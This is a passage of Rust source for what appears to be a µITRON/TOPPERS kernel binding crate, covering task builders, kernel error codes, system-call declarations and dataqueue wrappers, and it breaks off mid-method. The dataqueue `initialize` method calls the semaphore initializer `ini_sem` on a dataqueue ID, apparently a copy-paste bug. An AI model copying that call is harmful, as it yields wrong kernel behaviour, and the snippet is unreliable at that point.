#[cfg(any(feature = "asp3", feature = "solid_asp3"))]
raw: abi::T_CTSK {
tskatr: abi::TA_NULL,
exinf: abi::EXINF::uninit(),
task: None,
itskpri: 0,
stksz: 0,
stk: core::ptr::null_mut(),
},
#[cfg(feature = "solid_fmp3")]
raw: abi::T_CTSK {
tskatr: abi::TA_NULL,
exinf: abi::EXINF::uninit(),
task: None,
itskpri: 0,
stksz: 0,
stk: core::ptr::null_mut(),
affinity: abi::uint_t::MAX,
iprcid: 0,
},
}
}
}
impl<Start, Stack, InitialPriority> Builder<Start, Stack, InitialPriority> {
/// (**Mandatory**) Specify the entry point.
#[inline]
pub fn start(
self,
value: impl crate::closure::IntoClosure + Send,
) -> Builder<(), Stack, InitialPriority> {
let (task, exinf) = value.into_closure();
Builder {
// FIXME: Use the struct update syntax when rust-lang/rfcs#2528
// is implemented
start: (),
stack: self.stack,
initial_priority: self.initial_priority,
assign_to_current_procesor: self.assign_to_current_procesor,
#[cfg(not(feature = "none"))]
raw: abi::T_CTSK {
task: Some(task),
exinf,
..self.raw
},
}
}
/// (**Mandatory**) Specify to use an automatically allocated stack
/// region of the specified size.
#[inline]
pub fn stack_size(self, size: usize) -> Builder<Start, (), InitialPriority> {
Builder {
start: self.start,
stack: (),
initial_priority: self.initial_priority,
assign_to_current_procesor: self.assign_to_current_procesor,
#[cfg(not(feature = "none"))]
raw: abi::T_CTSK {
stksz: size,
stk: core::ptr::null_mut(),
..self.raw
},
}
}
/// (**Mandatory**) Specify the initial priority.
#[inline]
pub fn initial_priority(self, value: Priority) -> Builder<Start, Stack, ()> {
Builder {
start: self.start,
stack: self.stack,
initial_priority: (),
assign_to_current_procesor: self.assign_to_current_procesor,
#[cfg(not(feature = "none"))]
raw: abi::T_CTSK {
itskpri: value,
..self.raw
},
}
}
/// Specify the task's initial assigned processor. Defaults to the
/// current processor when unspecified.
#[inline]
pub fn initial_processor(self, value: Processor) -> Self {
#[cfg(not(feature = "solid_fmp3"))]
let Processor::UNIPROCESSOR = value;
Builder {
assign_to_current_procesor: false,
#[cfg(feature = "solid_fmp3")]
raw: abi::T_CTSK {
iprcid: value.as_raw(),
..self.raw
},
..self
}
}
/// Specify the task's assignable processsor set. Defaults to all
/// processors when unspecified.
///
/// This function might panic if an invalid processor ID is specified
/// or the set is empty.
///
/// # Examples
///
/// ```rust,no_run
/// #![feature(const_option)]
/// use itron::{task::Task, processor::Processor};
/// let processor = itron::processor::current().unwrap();
/// let task = Task::build()
/// .start(move || {})
/// .stack_size(4096)
/// .initial_priority(4)
/// .initial_processor(processor)
/// .processor_affinity([processor])
/// .finish()
/// .expect("failed to create a task");
/// ```
#[inline]
pub fn processor_affinity(self, value: impl IntoProcessorSet) -> Self {
// On a uniprocessor system, panic when an empty set is given
// because it's a very pathological condition, and we don't want to
// go to the length of making `finish` return `E_PAR` for such a
// condition
#[cfg(not(feature = "solid_fmp3"))]
value.assert_non_empty();
Builder {
#[cfg(feature = "solid_fmp3")]
raw: abi::T_CTSK {
affinity: value.into_uint_t(),
..self.raw
},
..self
}
}
}
impl Builder<(), (), ()> {
/// Create a task using the specified parameters.
#[allow(unused_mut)]
pub fn finish(mut self) -> Result<Task, Error<BuildError>> {
#[cfg(feature = "solid_fmp3")]
if self.assign_to_current_procesor {
unsafe { Error::err_if_negative(abi::get_pid(&mut self.raw.iprcid))? };
}
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let id = Error::err_if_negative(abi::acre_tsk(&self.raw))?;
// Safety: We own the task we create
Ok(Task::from_raw_nonnull(abi::NonNullID::new_unchecked(id)))
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// Create and activate a task using the specified parameters.
#[allow(unused_mut)]
#[doc(alias = "TA_ACT")]
pub fn finish_and_activate(mut self) -> Result<Task, Error<BuildError>> {
#[cfg(not(feature = "none"))]
{
self.raw.tskatr |= abi::TA_ACT;
}
self.finish()
}
}
/// An owned task.
///
/// [Deletes] the task automatically when dropped. The destructor will
/// panic if the deletion fails.
///
/// [Deletes]: TaskRef::delete
#[derive(PartialEq, Eq)]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub struct Task(TaskRef<'static>);
impl fmt::Debug for Task {
#[inline]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
self.0.fmt(f)
}
}
impl Drop for Task {
#[inline]
fn drop(&mut self) {
unsafe { self.0.delete().unwrap() };
}
}
impl Task {
/// Construct a `Task` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self(unsafe { TaskRef::from_raw_nonnull(id) })
}
/// Consume and "leak" `self`, returning a reference `TaskRef<'a>`.
#[inline]
pub const fn leak<'a>(self) -> TaskRef<'a> {
let out = self.0;
core::mem::forget(self);
out
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(&self) -> abi::ID {
self.0.as_raw()
}
/// Get the raw object ID as [`abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
self.0.as_raw_nonnull()
}
/// Borrow `Task` as [`TaskRef`].
///
/// Use this to perform operations on tasks because most of the methods
/// are implemented on `TaskRef` but not `Task`.
#[inline]
pub const fn as_ref(&self) -> TaskRef<'_> {
self.0
}
}
}
<file_sep>/src/abi/error.rs
use super::ER;
/// 正常終了
pub const E_OK: ER = 0;
/// システムエラー
pub const E_SYS: ER = -5;
/// 未サポート機能
pub const E_NOSPT: ER = -9;
/// 予約機能コード
pub const E_RSFN: ER = -10;
/// 予約属性
pub const E_RSATR: ER = -11;
/// パラメータエラー
pub const E_PAR: ER = -17;
/// 不正ID番号
pub const E_ID: ER = -18;
/// コンテキストエラー
pub const E_CTX: ER = -25;
/// メモリアクセス違反
pub const E_MACV: ER = -26;
/// オブジェクトアクセス違反
pub const E_OACV: ER = -27;
/// サービスコール不正使用
pub const E_ILUSE: ER = -28;
/// メモリ不足
pub const E_NOMEM: ER = -33;
/// ID番号不足
pub const E_NOID: ER = -34;
/// 資源不足
pub const E_NORES: ER = -35;
/// オブジェクト状態エラー
pub const E_OBJ: ER = -41;
/// オブジェクト未生成
pub const E_NOEXS: ER = -42;
/// キューイングオーバーフロー
pub const E_QOVR: ER = -43;
/// 待ち状態の強制解除
pub const E_RLWAI: ER = -49;
/// ポーリング失敗またはタイムアウト
pub const E_TMOUT: ER = -50;
/// 待ちオブジェクトの削除
pub const E_DLT: ER = -51;
/// 待ちオブジェクトの状態変化
pub const E_CLS: ER = -52;
/// タスクの終了要求
pub const E_RASTER: ER = -53;
/// ノンブロッキング受付け
pub const E_WBLK: ER = -57;
/// バッファオーバーフロー
pub const E_BOVR: ER = -58;
/// 通信エラー
pub const E_COMM: ER = -65;
<file_sep>/src/prioritydataqueue.rs
//! Priority dataqueues (TODO)
// TODO: acre_pdq
// TODO: del_pdq
// TODO: snd_pdq
// TODO: psnd_pdq
// TODO: tsnd_pdq
// TODO: rcv_pdq
// TODO: prcv_pdq
// TODO: trcv_pdq
// TODO: ini_pdq
// TODO: ref_pdq
<file_sep>/src/abi/system.rs
use super::{bool_t, uint_t, ER, ID, PRI};
/// システム状態管理機能
#[cfg(any(
feature = "asp3",
feature = "fmp3",
feature = "solid_asp3",
feature = "solid_fmp3"
))]
extern "C" {
pub fn rot_rdq(tskpri: PRI) -> ER;
pub fn get_tid(p_tskid: *mut ID) -> ER;
pub fn get_lod(tskpri: PRI, p_load: *mut uint_t) -> ER;
pub fn get_nth(tskpri: PRI, nth: uint_t, p_tskid: *mut ID) -> ER;
pub fn loc_cpu() -> ER;
pub fn unl_cpu() -> ER;
pub fn dis_dsp() -> ER;
pub fn ena_dsp() -> ER;
pub fn sns_ctx() -> bool_t;
pub fn sns_loc() -> bool_t;
pub fn sns_dsp() -> bool_t;
pub fn sns_dpn() -> bool_t;
pub fn sns_ker() -> bool_t;
pub fn ext_ker() -> ER;
}
#[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
extern "C" {
pub fn mrot_rdq(tskpri: PRI, prcid: ID) -> ER;
pub fn get_pid(p_prcid: *mut ID) -> ER;
pub fn mget_lod(schedid: ID, tskpri: PRI, p_load: *mut uint_t) -> ER;
pub fn mget_nth(schedid: ID, tskpri: PRI, nth: uint_t, p_tskid: *mut ID) -> ER;
}
<file_sep>/src/dataqueue.rs
//! Dataqueues
use core::{fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
time::Timeout,
};
define_error_kind! {
/// Error type for [`DataqueueRef::send`].
pub enum SendError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for SendError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`DataqueueRef::send_timeout`].
pub enum SendTimeoutError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for SendTimeoutError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// E_PAR is considered critial, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`DataqueueRef::try_send`].
pub enum TrySendError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
}
}
impl ErrorKind for TrySendError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`DataqueueRef::send_forced`].
pub enum SendForcedError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
/// The queue length is zero.
#[cfg(not(feature = "none"))]
ZeroSized,
}
}
impl ErrorKind for SendForcedError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ILUSE => Some(Self::ZeroSized(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`DataqueueRef::recv`].
pub enum RecvError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for RecvError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`DataqueueRef::recv_timeout`].
pub enum RecvTimeoutError {
#[cfg(not(feature = "none"))]
BadContext,
/// The task is a restricted task.
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
NotSupported,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
#[cfg(not(feature = "none"))]
Released,
#[cfg(not(feature = "none"))]
TerminateRequest,
#[cfg(all(not(feature = "none"), feature = "dcre"))]
Deleted,
}
}
impl ErrorKind for RecvTimeoutError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// E_PAR is considered critial, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "rstr_task"))]
abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(all(not(feature = "none"), feature = "dcre"))]
abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`DataqueueRef::try_recv`].
pub enum TryRecvError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
Timeout,
}
}
impl ErrorKind for TryRecvError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`DataqueueRef::initialize`].
pub enum InitializeError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InitializeError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`DataqueueRef::info`].
pub enum InfoError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
}
}
impl ErrorKind for InfoError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`Dataqueue::build`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum BuildError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(any())]
AccessDenied,
/// Ran out of memory or dataqueue IDs, or the specified capacity
/// does not fit in `uint_t`.
#[cfg(not(feature = "none"))]
OutOfMemory,
/// Bad parameter.
#[cfg(not(feature = "none"))]
BadParam,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for BuildError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
// `E_MACV` is considered critical, hence excluded
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_NOID | abi::E_NOMEM => Some(Self::OutOfMemory(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_PAR | abi::E_RSATR => Some(Self::BadParam(Kind::from_error_code(code))),
_ => None,
}
}
}
define_error_kind! {
/// Error type for [`DataqueueRef::delete`].
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub enum DeleteError {
#[cfg(not(feature = "none"))]
BadContext,
#[cfg(not(feature = "none"))]
BadId,
#[cfg(any())]
AccessDenied,
#[cfg(not(feature = "none"))]
BadState,
}
}
#[cfg(feature = "dcre")]
impl ErrorKind for DeleteError {
fn from_error_code(code: ErrorCode) -> Option<Self> {
match code.get() {
#[cfg(not(feature = "none"))]
abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
#[cfg(any())]
abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
#[cfg(not(feature = "none"))]
abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
_ => None,
}
}
}
/// The unit of data that can be sent through a dataqueue.
///
/// # Rationale
///
/// Although the data element type used by the kernel API is signed, in Rust,
/// unsigned integer types are preferred to represent raw data.
pub type DataElement = usize;
/// Dataqueue information returned by [`DataqueueRef::info`].
#[derive(Debug, Clone, Copy)]
pub struct Info {
#[cfg(not(feature = "none"))]
raw: abi::T_RDTQ,
}
impl Info {
/// Get the number of data items contained in the dataqueue.
#[inline]
pub fn len(&self) -> usize {
match () {
// Since `sdtqcnt` represents a number of objects in memory, the
// conversion should not cause an overflow
#[cfg(not(feature = "none"))]
() => self.raw.sdtqcnt as usize,
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// Get a flag indicating whether the dataqueue is empty.
#[inline]
pub fn is_empty(&self) -> bool {
self.len() == 0
}
/// Get the first waiting sender's task ID.
#[inline]
pub fn first_waiting_sending_task_id(&self) -> Option<abi::NonNullID> {
match () {
#[cfg(not(feature = "none"))]
() => abi::NonNullID::new(self.raw.stskid),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// Get the first waiting receiver's task ID.
#[inline]
pub fn first_waiting_receiving_task_id(&self) -> Option<abi::NonNullID> {
match () {
#[cfg(not(feature = "none"))]
() => abi::NonNullID::new(self.raw.rtskid),
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// A borrowed reference to a dataqueue.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct DataqueueRef<'a> {
id: abi::NonNullID,
_phantom: PhantomData<&'a ()>,
}
impl fmt::Debug for DataqueueRef<'_> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "Dataqueue({})", self.id)
}
}
/// # Object ID conversion
impl DataqueueRef<'_> {
/// Construct a `DataqueueRef` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self {
id,
_phantom: PhantomData,
}
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(self) -> abi::ID {
self.id.get()
}
/// Get the raw object ID as [` abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(self) -> abi::NonNullID {
self.id
}
}
/// # Management
impl DataqueueRef<'_> {
/// `del_dtq`: Delete the dataqueue.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
#[doc(alias = "del_dtq")]
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::del_dtq(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ref_dtq`: Get the dataqueue's general information.
#[inline]
#[doc(alias = "ref_dtq")]
pub fn info(self) -> Result<Info, Error<InfoError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut pri = MaybeUninit::uninit();
Error::err_if_negative(abi::ref_dtq(self.as_raw(), pri.as_mut_ptr()))?;
Ok(Info {
raw: pri.assume_init(),
})
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// # Dataqueue Operations
impl DataqueueRef<'_> {
/// `snd_dtq`: Send a data element to the dataqueue. Blocks the current task
/// if the dataqueue is full.
#[inline]
#[doc(alias = "snd_dtq")]
pub fn send(self, data_element: DataElement) -> Result<(), Error<SendError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::snd_dtq(self.as_raw(), data_element as isize))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `tsnd_dtq`: Send a data element to the dataqueue. Blocks the current
/// task with timeout if the dataqueue is full.
#[inline]
#[doc(alias = "tsnd_dtq")]
pub fn send_timeout(
self,
data_element: DataElement,
tmo: Timeout,
) -> Result<(), Error<SendTimeoutError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::tsnd_dtq(
self.as_raw(),
data_element as isize,
tmo.as_raw(),
))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `psnd_dtq`: Send a data element to the dataqueue. Fails and returns an
/// error if the dataqueue is full.
#[inline]
#[doc(alias = "psnd_dtq")]
pub fn try_send(self, data_element: DataElement) -> Result<(), Error<TrySendError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::psnd_dtq(self.as_raw(), data_element as isize))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `fsnd_dtq`: Send a data element to the dataqueue. Removes ("pushes out")
/// the oldest element if the dataqueue is full.
#[inline]
#[doc(alias = "fsnd_dtq")]
pub fn send_forced(self, data_element: DataElement) -> Result<(), Error<SendForcedError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::fsnd_dtq(self.as_raw(), data_element as isize))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `rcv_dtq`: Receive a data element from the dataqueue. Blocks the current
/// task if the dataqueue is empty.
///
/// # Rationale
///
/// This method is named `recv` instead of `receive` following the suit of
/// `std::sync::mpsc::Receiver::recv` and `std::net::UdpSocket::recv`.
#[inline]
#[doc(alias = "rcv_dtq")]
pub fn recv(self) -> Result<DataElement, Error<RecvError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut out = MaybeUninit::<isize>::uninit();
Error::err_if_negative(abi::rcv_dtq(self.as_raw(), out.as_mut_ptr()))?;
Ok(out.assume_init() as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `trcv_dtq`: Receive a data element to the dataqueue. Blocks the current
/// task with timeout if the dataqueue is empty.
#[inline]
#[doc(alias = "trcv_dtq")]
pub fn recv_timeout(self, tmo: Timeout) -> Result<DataElement, Error<RecvTimeoutError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut out = MaybeUninit::<isize>::uninit();
Error::err_if_negative(abi::trcv_dtq(
self.as_raw(),
out.as_mut_ptr(),
tmo.as_raw(),
))?;
Ok(out.assume_init() as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `prcv_dtq`: Receive a data element to the dataqueue. Fails and returns
/// an error if the dataqueue is empty.
#[inline]
#[doc(alias = "prcv_dtq")]
pub fn try_recv(self) -> Result<DataElement, Error<TryRecvError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
let mut out = MaybeUninit::<isize>::uninit();
Error::err_if_negative(abi::prcv_dtq(self.as_raw(), out.as_mut_ptr()))?;
Ok(out.assume_init() as usize)
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
/// `ini_sem`: Initialize the dataqueue.
#[inline]
#[doc(alias = "ini_sem")]
pub fn initialize(self) -> Result<(), Error<InitializeError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
Error::err_if_negative(abi::ini_sem(self.as_raw()))?;
Ok(())
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
#[cfg(feature = "dcre")]
pub use self::owned::*;
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
use super::*;
use crate::wait::QueueOrder;
use core::convert::TryInto;
/// The builder type for [dataqueues](Dataqueue). Created by [`Dataqueue::build`].
///
/// Its generic parameters are an implementation detail.
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
#[must_use = "`Builder` creates nothing unless you call `.finish()`"]
pub struct Builder<Capacity> {
#[allow(dead_code)]
capacity: Capacity,
capacity_overflow: bool,
#[cfg(not(feature = "none"))]
raw: abi::T_CDTQ,
}
/// Builder field hole types
#[allow(non_camel_case_types)]
#[doc(hidden)]
pub mod builder_hole {
pub struct __capacity_is_not_specified__;
}
impl Dataqueue {
/// `acre_dtq`: Create a builder for `Dataqueue`.
///
/// # Examples
///
/// ```rust,no_run
/// use itron::dataqueue::Dataqueue;
/// let dataqueue = Dataqueue::build()
/// .capacity(2)
/// .finish()
/// .expect("failed to create a dataqueue");
///
/// dataqueue.as_ref().send(1)
/// .expect("failed to send a data element");
/// dataqueue.as_ref().send(2)
/// .expect("failed to send a data element");
/// dataqueue.as_ref().try_send(3)
/// .expect_err("unexpectedly succeeded to send a data element");
/// ```
#[inline]
#[doc(alias = "acre_dtq")]
pub fn build() -> Builder<builder_hole::__capacity_is_not_specified__> {
Builder {
capacity: builder_hole::__capacity_is_not_specified__,
capacity_overflow: false,
#[cfg(not(feature = "none"))]
raw: abi::T_CDTQ {
dtqatr: abi::TA_NULL,
dtqcnt: 0,
dtqmb: core::ptr::null_mut(),
},
}
}
}
// TODO: abi::T_CDTQ::dtqmb
impl<Capacity> Builder<Capacity> {
/// (**Mandatory**) Specify the dataqueue's capacity, measured in
/// number of data elements.
#[inline]
pub fn capacity(self, value: usize) -> Builder<()> {
let (capacity, capacity_overflow) = match value.try_into() {
Ok(x) => (x, false),
Err(_) => (0, true),
};
Builder {
// FIXME: Use the struct update syntax when rust-lang/rfcs#2528
// is implemented
capacity: (),
capacity_overflow,
#[cfg(not(feature = "none"))]
raw: abi::T_CDTQ {
dtqcnt: capacity,
..self.raw
},
}
}
/// Specify the queue order. Defaults to `Fifo` when unspecified.
#[inline]
pub fn queue_order(self, value: QueueOrder) -> Self {
Builder {
#[cfg(not(feature = "none"))]
raw: abi::T_CDTQ {
dtqatr: value.as_raw_atr(),
